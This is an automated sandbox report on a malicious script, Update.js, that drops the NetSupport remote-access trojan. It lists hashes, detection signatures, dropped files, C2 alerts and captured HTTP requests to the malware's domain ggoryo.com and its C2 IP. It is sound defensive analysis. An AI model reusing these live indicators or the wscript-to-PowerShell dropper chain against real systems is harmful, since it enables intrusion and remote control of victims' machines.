Windows Analysis Report
Update.js

Overview

General Information

Sample name: Update.js
Analysis ID: 1529030
MD5: 01d7daa58e16da2b30ac20fe57081bba
SHA1: 8213900420ed4c22b1e896acb53f99a5989cb2cd
SHA256: a05933c299a81badef96fd575ff0f7d934c3edaf0f7478e897a2299f1ef8f11e
Detection

NetSupport RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

AV Detection

Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary, 10_2_110ADA40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll
Source: unknown HTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2533582731.000000006CCA1000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538791982.00000000747F2000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000A.00000000.1514998417.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538169520.0000000073A85000.00000002.00000001.01000000.0000000A.sdmp, pcicapi.dll.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle, 10_2_111273E0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 10_2_1102D9F4
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 10_2_1102DD21
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose, 10_2_1110BD70
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA, 10_2_110663B0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError, 10_2_1106ABD0

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49708 -> 5.181.159.137:443
Source: C:\Windows\System32\wscript.exe Network Connect: 77.83.199.112 443
Source: global traffic HTTP traffic detected: GET /trade/da.php?9800 HTTP/1.1Host: ggoryo.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 104.26.1.231
Source: Joe Sandbox View ASN Name: ASN-MOLMoscowRussiaRU
Source: Joe Sandbox View ASN Name: MIVOCLOUDMD
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: POST /trade/fix.php?6867 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ggoryo.comContent-Length: 7Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 5.181.159.137
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: ggoryo.com
Source: global traffic DNS traffic detected: DNS query: geo.netsupportsoftware.com
Source: unknown HTTP traffic detected: POST /trade/fix.php?6867 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ggoryo.comContent-Length: 7Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr String found in binary or memory: http://%s/fakeurl.htm
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr String found in binary or memory: http://%s/testpage.htm
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: client32.exe, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://127.0.0.1
Source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: wscript.exe, 00000000.00000003.1346975876.000001FC5729F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: client32.exe, 0000000A.00000003.1821012459.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1827697976.00000000059EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: client32.exe, 0000000A.00000003.1532975213.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspwe
Source: client32.exe, 0000000A.00000003.1532975213.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspws
Source: powershell.exe, 00000008.00000002.1567156116.0000026C01667000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ggoryo.com
Source: powershell.exe, 00000008.00000002.1738259741.0000026C1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crt
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: http://sv.symcd.com0&
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr String found in binary or memory: http://www.netsupportsoftware.com
Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://www.pci.co.uk/support
Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: http://www.symauth.com/cps0(
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: http://www.symauth.com/rpa00
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ggorxo.com/
Source: powershell.exe, 00000008.00000002.1567156116.0000026C0139F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00229000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com
Source: wscript.exe, 00000000.00000003.1346975876.000001FC57274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1346975876.000001FC5729F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com/
Source: wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com/0X
Source: wscript.exe, 00000000.00000003.1346975876.000001FC57274000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com/s
Source: wscript.exe, 00000000.00000003.1487288378.000001FC55788000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com/trade/da
